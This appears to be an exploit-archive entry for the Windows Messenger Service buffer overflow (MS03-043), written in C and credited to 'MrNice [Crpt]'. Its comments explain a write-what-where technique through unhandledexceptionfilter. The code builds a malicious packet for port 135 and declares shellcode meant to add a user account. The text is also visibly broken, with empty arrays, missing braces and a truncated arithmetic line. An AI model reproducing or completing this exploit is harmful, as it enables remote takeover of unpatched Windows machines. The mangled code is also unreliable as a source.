Microsoft Windows Messenger Service Remote Exploit FR (MS03-043)

                              /*                [Crpt] MS03-043 - Messenger exploit by MrNice [Crpt]                      */
                              /*              ---------------------------------------------------------------                     */
                              /*                                                                                                                  */
                              /*               This Sploit use the unhandledexceptionfilter to redirect                      */
                              /*               the execution. When overflow occur we have :                                   */
                              /*                                                                                                                  */
                              /*               mov    eax,esi+8                                                                   */
                              /*               mov    ecx,esi+Ch                                                                     */
                              /*               mov    dword ptr ds:[ecx],eax                                                     */
                              /*                                                                                                                  */
                              /*               so we control ecx and edx and we can write 4 bytes                            */
                              /*               where we want.                                                                              */
                              /*               If we try to write in a not writable memory zone, an                            */
                              /*               excepetion is lauched and unhandledexceptionfilter too.                     */
                              /*                                                                   */
                              /*               A part of unhandledexceptionfilter :                                                 */
                              /*                                                                                                                  */
                              /*              mov     eax, dword_0_77ECF44C(=where)                                      */
                              /*              cmp     eax, ebx                                     */
                              /*              jz      short loc_0_77EA734C                                      */
                              /*              push    esi                                                                 */
                              /*              call    eax                                                                */
                              /*                                                           */
                              /*               So we write the "WHAT"(=jmp esi+4Ch) at                                        */
                              /*               the "WHERE"(=77EA734C here) and when the exception occur             */
                              /*               the unhandledexceptionfilter is lauched so when call eax                    */
                              /*               occur, it execute our code.                                                              */ 
                              /*                                                                                   */
                              /*               Thx Kotik who coded the proof of concept,and Metasploit                    */
                              /*               for Shellcode and last but not least kralor,Scurt from Crpt                   */
                              /*                                                                                                                  */
                              /*               Tested on win2k FR SP0                                                                 */
                              /*                                                                                                                  */
                              /*                                                                                                                  */

                              #ifdef _WIN32
                              #pragma comment (lib,"ws2_32")
                              static unsigned char packet_header[] =

                              unsigned char field_header[] =

                              unsigned char ShellCode[] = // XorDecode        23 bytes
                              // AddUser:X Pass:X

                              int main(int argc,char *argv[])
                              int i, packet_size, fields_size, s,sp;
                              unsigned char packet[8192];
                              struct sockaddr_in addr;
                              // A few conditions :
                              // 0 \n",argv[0]);
                              return -1;

                              #ifdef _WIN32
                              if(WSAStartup(0x101,&wsaData)) {
                              printf("error: unable to load winsock.\n");
                              return -1;

                              addr.sin_family = AF_INET;
                              addr.sin_addr.s_addr = inet_addr(argv[1]);
                              addr.sin_port = htons(135);

                              packet_size = 0;

                              memcpy(&packet[packet_size], packet_header, sizeof(packet_header) - 1);
                              packet_size += sizeof(packet_header) - 1;

                              i = strlen(from) + 1;
                              *(unsigned int *)(&field_header[0]) = i;
                              *(unsigned int *)(&field_header[8]) = i;
                              memcpy(&packet[packet_size], field_header, sizeof(field_header) - 1);
                              packet_size += sizeof(field_header) - 1;
                              strcpy(&packet[packet_size], from);
                              packet_size += (((i - 1) >> 2) + 1) > 2) + 1) 

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